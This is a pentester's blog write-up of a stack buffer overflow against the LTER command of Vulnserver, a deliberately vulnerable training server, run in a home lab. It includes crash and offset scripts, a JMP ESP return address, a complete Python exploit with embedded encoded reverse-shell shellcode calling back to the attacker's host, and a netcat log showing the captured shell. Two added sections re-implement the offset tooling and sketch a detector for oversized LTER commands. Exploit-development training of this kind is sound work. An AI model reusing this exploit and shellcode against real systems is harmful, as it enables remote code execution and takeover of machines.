Vulnserver LTER EIP Overwrite – A Little Easier This Time

Although this is a simpler exploit than the SEH overwrite, I wanted to share my LTER EIP overwrite as well.

Vulnserver LTER EIP Overwrite - Introduction

First, if you haven't read my SEH overwrite post, then I recommend you start there. I actually discovered this vulnerability during that process, so I will skip a few of the beginning steps.

Additionally, I won't really cover the character restrictions in this post, so you should read part 2 as well.

Crashing the Service

First, I grabbed my template from the earlier LTER exploit.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.5.96"
port = 9999

length = 3000

padding = "A" * length

buffer = padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("LTER /.:/" + buffer)

print s.recv(1024)

s.close()

As you can see, 3000 bytes gives me full control over EIP (as well as EBP).

Vulnserver LTER EIP - EIP Overwrite

Calculating the Offset

With the overwrite verified, it was time to calculate the offset to EIP.

First, I generated a pattern of 3000 bytes.

root@kali:~/vulnserver/lter/eip# msf-pattern_create -l 3000

When I sent this to the server, EIP was overwritten with 0x386f4337.

Vulnserver LTER EIP - EIP Pattern

Putting this into pattern_offset gave me an offset of 2003 bytes.

root@kali:~/vulnserver/lter/eip# msf-pattern_offset -l 3000 -q 386f4337
[*] Exact match at offset 2003
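The two Metasploit helpers above hide a small algorithm worth seeing once: the pattern is just every upper-case letter, lower-case letter and digit combined into three-character triplets, and the "offset" is where the four bytes sitting in EIP (little-endian in memory) appear in that string. The following Python 3 code is an added example and not part of the original post; it re-implements the pattern and the lookup and reproduces the 2003 result from the value 0x386f4337. One full cycle is 20280 characters; for longer lengths this version simply wraps around, which is an assumption for illustration (the real tool extends its character sets instead), so offsets past 20280 would be ambiguous here.

```python
import string
import struct

# One cycle of the Aa0Aa1Aa2...Zz9 pattern: 26 * 26 * 10 triplets = 20280 chars.
_CYCLE = "".join(
    u + l + d
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
)


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern.

    Assumption: beyond one cycle the pattern repeats, unlike the real tool.
    """
    reps = length // len(_CYCLE) + 1
    return (_CYCLE * reps)[:length]


def pattern_offset(value, length):
    """Locate a crashed register value inside a pattern of `length` bytes.

    `value` is either the register contents as read in the debugger (an int
    such as 0x386f4337, stored little-endian in memory) or the 4-character
    string seen in the dump. Returns the 0-based offset, or None if the
    value does not come from the pattern at all.
    """
    if isinstance(value, int):
        try:
            needle = struct.pack("<I", value).decode("ascii")
        except UnicodeDecodeError:
            return None  # non-ASCII bytes cannot come from the pattern
    else:
        needle = value
    if len(needle) != 4:
        raise ValueError("need exactly 4 bytes/characters to search for")
    idx = pattern_create(length).find(needle)
    return None if idx == -1 else idx


if __name__ == "__main__":
    # The EIP value observed after sending a 3000-byte pattern to LTER.
    print("offset of 0x386f4337:", pattern_offset(0x386f4337, 3000))  # 2003
```

Because each triplet is unique within a cycle, any four consecutive characters identify exactly one position, which is why a single register value is enough to recover the offset.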

Vulnserver LTER EIP - Verifying Control

Once I calculated my offset, I updated my exploit harness to check the value.

offset = 2003
length = 3000

padding = "A" * offset
overwrite = "BBBB"
extra = "C" * (length - (len(padding) + len(overwrite)))

When I sent this updated payload, EIP was overwritten with my "B"s as expected!

Vulnserver LTER EIP - EIP Control

Additionally, ESP was pointing directly to my extra "C" bytes, indicating that this was a straightforward EIP overwrite to JMP ESP.

Vulnserver LTER EIP - ESP

Vulnserver LTER EIP - JMP ESP

With control of EIP verified, it was time to use mona to find a jump to ESP.

Vulnserver LTER EIP - Mona JMP

When I resent my updated payload, I hit the breakpoint that I had set on my selected (ASCII) JMP ESP.

Vulnserver LTER EIP - Breakpoint

Shells, Shells, Shells

Since I already knew I had working reverse shell code from my earlier exploit, I just decided to reuse that.

Next, I resent my completed exploit to the listening server.

root@kali:~/vulnserver/lter/eip# python lter_eip_reverse.py
Welcome to Vulnerable Server! Enter HELP for help.

[+] Sending exploit...

On the server side of things, there were no unhandled exceptions, which was a good sign.

Vulnserver LTER EIP - No Crash

Back on my attacking box, I was able to catch the reverse shell and get my command execution!

root@kali:~/vulnserver/lter/eip# nc -lvvp 4444
listening on [any] 4444 ...
192.168.5.96: inverse host lookup failed: Unknown host
connect to [192.168.5.97] from (UNKNOWN) [192.168.5.96] 49264
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\IEUser\Documents\vulnserver>whoami
whoami
ie8win7\ieuser

Vulnserver LTER EIP - Reverse Shell

The Code

Here is the final exploit that I used for my reverse shell.

#!/usr/bin/python

import socket
import os
import sys

host = "192.168.5.96"
port = 9999

offset = 2003
length = 3000

buffer = "A" * offset
# 0x62501205 = JMP ESP
buffer += "\x05\x12\x50\x62"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.5.97 LPORT=4444 -f py -e x86/alpha_mixed BufferRegister=ESP
buf =  ""
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x68\x68\x6c\x42\x43\x30\x37\x70\x57\x70\x61"
buf += "\x70\x6c\x49\x6d\x35\x34\x71\x6f\x30\x42\x44\x4c\x4b"
buf += "\x70\x50\x44\x70\x6c\x4b\x70\x52\x36\x6c\x6c\x4b\x70"
buf += "\x52\x65\x44\x6e\x6b\x43\x42\x77\x58\x36\x6f\x4c\x77"
buf += "\x43\x7a\x65\x76\x74\x71\x59\x6f\x6c\x6c\x75\x6c\x53"
buf += "\x51\x43\x4c\x75\x52\x56\x4c\x35\x70\x4a\x61\x5a\x6f"
buf += "\x64\x4d\x43\x31\x7a\x67\x48\x62\x6c\x32\x62\x72\x62"
buf += "\x77\x4e\x6b\x42\x72\x46\x70\x6e\x6b\x53\x7a\x57\x4c"
buf += "\x6e\x6b\x70\x4c\x44\x51\x43\x48\x48\x63\x57\x38\x53"
buf += "\x31\x48\x51\x53\x61\x4c\x4b\x62\x79\x37\x50\x37\x71"
buf += "\x78\x53\x6e\x6b\x61\x59\x42\x38\x6b\x53\x67\x4a\x42"
buf += "\x69\x4e\x6b\x37\x44\x4c\x4b\x75\x51\x4b\x66\x65\x61"
buf += "\x39\x6f\x6c\x6c\x69\x51\x7a\x6f\x46\x6d\x76\x61\x78"
buf += "\x47\x56\x58\x39\x70\x64\x35\x39\x66\x67\x73\x63\x4d"
buf += "\x68\x78\x45\x6b\x31\x6d\x66\x44\x62\x55\x4b\x54\x62"
buf += "\x78\x6c\x4b\x50\x58\x56\x44\x33\x31\x58\x53\x42\x46"
buf += "\x4c\x4b\x54\x4c\x32\x6b\x4c\x4b\x46\x38\x57\x6c\x56"
buf += "\x61\x6a\x73\x4c\x4b\x64\x44\x4c\x4b\x65\x51\x48\x50"
buf += "\x6d\x59\x31\x54\x64\x64\x76\x44\x71\x4b\x33\x6b\x45"
buf += "\x31\x66\x39\x73\x6a\x73\x61\x6b\x4f\x79\x70\x71\x4f"
buf += "\x43\x6f\x31\x4a\x4c\x4b\x45\x42\x6a\x4b\x4c\x4d\x31"
buf += "\x4d\x73\x58\x67\x43\x76\x52\x47\x70\x55\x50\x73\x58"
buf += "\x53\x47\x43\x43\x65\x62\x73\x6f\x36\x34\x55\x38\x52"
buf += "\x6c\x30\x77\x56\x46\x44\x47\x49\x6f\x6e\x35\x78\x38"
buf += "\x4e\x70\x66\x61\x55\x50\x35\x50\x65\x79\x6f\x34\x66"
buf += "\x34\x46\x30\x55\x38\x34\x69\x6d\x50\x50\x6b\x35\x50"
buf += "\x79\x6f\x4a\x75\x30\x50\x52\x70\x62\x70\x66\x30\x61"
buf += "\x50\x36\x30\x31\x50\x62\x70\x33\x58\x4a\x4a\x46\x6f"
buf += "\x4b\x6f\x79\x70\x69\x6f\x4a\x75\x4a\x37\x32\x4a\x34"
buf += "\x45\x30\x68\x49\x50\x4f\x58\x57\x75\x51\x71\x65\x38"
buf += "\x37\x72\x63\x30\x77\x61\x53\x6c\x4c\x49\x4a\x46\x31"
buf += "\x7a\x44\x50\x53\x66\x36\x37\x50\x68\x6e\x79\x59\x35"
buf += "\x64\x34\x63\x51\x4b\x4f\x4b\x65\x4c\x45\x6f\x30\x50"
buf += "\x74\x76\x6c\x69\x6f\x42\x6e\x66\x68\x63\x45\x38\x6c"
buf += "\x55\x38\x6c\x30\x38\x35\x4d\x72\x30\x56\x69\x6f\x38"
buf += "\x55\x61\x78\x62\x43\x32\x4d\x45\x34\x67\x70\x6b\x39"
buf += "\x6b\x53\x56\x37\x33\x67\x36\x37\x50\x31\x5a\x56\x30"
buf += "\x6a\x64\x52\x61\x49\x73\x66\x5a\x42\x4b\x4d\x55\x36"
buf += "\x58\x47\x37\x34\x77\x54\x45\x6c\x56\x61\x77\x71\x4c"
buf += "\x4d\x61\x54\x31\x34\x32\x30\x6a\x66\x67\x70\x51\x54"
buf += "\x61\x44\x76\x30\x56\x36\x33\x66\x62\x76\x52\x66\x53"
buf += "\x66\x30\x4e\x53\x66\x62\x76\x62\x73\x71\x46\x70\x68"
buf += "\x32\x59\x5a\x6c\x57\x4f\x4c\x46\x4b\x4f\x59\x45\x4d"
buf += "\x59\x39\x70\x42\x6e\x51\x46\x72\x66\x79\x6f\x70\x30"
buf += "\x52\x48\x57\x78\x6e\x67\x45\x4d\x35\x30\x69\x6f\x39"
buf += "\x45\x6f\x4b\x6c\x30\x68\x35\x6d\x72\x76\x36\x71\x78"
buf += "\x4f\x56\x7a\x35\x4f\x4d\x4f\x6d\x79\x6f\x4a\x75\x55"
buf += "\x6c\x66\x66\x31\x6c\x45\x5a\x6b\x30\x6b\x4b\x79\x70"
buf += "\x73\x45\x33\x35\x6f\x4b\x32\x67\x75\x43\x34\x32\x30"
buf += "\x6f\x50\x6a\x65\x50\x71\x43\x39\x6f\x6e\x35\x41\x41"

buffer += buf

buffer += "B" * (length - len(buffer))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((host,port))

print s.recv(1024)

print "[+] Sending exploit..."

s.send("LTER /.:/" + buffer)

print s.recv(1024)

s.close()
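Seen from the other side, the exploit above has a very recognisable shape on the wire: an LTER command whose argument is thousands of bytes long, made up mostly of one repeated padding byte, with a few non-printable bytes where the return address sits. The following Python 3 code is an added example, not part of the original post, showing how a sensor or a logging wrapper in front of the service could flag such commands. The sample commands, the 1024-byte argument limit and the 64-byte run threshold are all constructed for illustration.

```python
import re

# Constructed sample of raw commands a sensor might have captured (not real
# traffic from the post). Index 2 mirrors the crash payload, index 3 mirrors
# the layout of the finished exploit (padding, return address, payload).
SAMPLE_COMMANDS = [
    b"HELP\n",
    b"LTER /.:/hello\n",
    b"LTER /.:/" + b"A" * 3000 + b"\n",
    b"LTER /.:/" + b"A" * 2003 + b"\x05\x12\x50\x62" + b"T" * 300 + b"\n",
    b"STATS hello\n",
]

MAX_ARG_LEN = 1024   # assumed sane upper bound for a legitimate LTER argument
MAX_RUN_LEN = 64     # longer runs of a single byte look like overflow padding


def analyze_command(raw):
    """Return a list of reasons this command looks like an overflow attempt.

    Only LTER commands are inspected; anything else returns an empty list.
    """
    findings = []
    if not raw.startswith(b"LTER "):
        return findings
    arg = raw[5:].rstrip(b"\r\n")

    # 1. Oversized argument: the service never needs kilobytes of input here.
    if len(arg) > MAX_ARG_LEN:
        findings.append(f"argument length {len(arg)} exceeds {MAX_ARG_LEN}")

    # 2. Long run of one byte: typical of the "A" * offset padding.
    run = re.search(rb"(.)\1{%d,}" % (MAX_RUN_LEN - 1), arg, re.DOTALL)
    if run:
        findings.append(f"run of {len(run.group(0))} x {run.group(1)!r}")

    # 3. Non-printable bytes: a text command should not carry raw addresses.
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if nonprint:
        findings.append(f"{nonprint} non-printable bytes in argument")

    return findings


def scan(commands):
    """Map the index of each suspicious command to its findings."""
    results = {}
    for i, cmd in enumerate(commands):
        findings = analyze_command(cmd)
        if findings:
            results[i] = findings
    return results


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_COMMANDS).items():
        print(f"command {idx}: " + "; ".join(reasons))
```

The length check alone catches both samples; the run and non-printable checks are there so that an alert carries enough detail to distinguish a crash probe from a weaponised payload, and so that a smaller but still malformed argument does not slip under the size limit.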

Vulnserver LTER EIP Overwrite - Conclusion

This was definitely easier than my earlier LTER exploit, but I wanted to finish it up for completeness' sake. Again, you can find the SEH exploit write-ups below.

I may only continue with one exploit per command, unless there is something particularly interesting about it.

If you have any suggestions for a command or exploit that I should work on next, then definitely let me know!

Finally, you can find the exploit in my GitHub repository, but let me know if you think there is anything that I should add.

doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.


Filed under Security Not Included

2 Responses to Vulnserver LTER EIP Overwrite – A Little Easier This Time

  1. Vida

    Hey there just wanted to give you a quick heads up.
    The text in your article seems to be running off the screen in Internet Explorer.

    I’m not sure if this is a format issue or something to do with web browser compatibility but I
    figured I’d post to let you know. The design and style look great though!
    Hope you get the problem fixed soon. Cheers
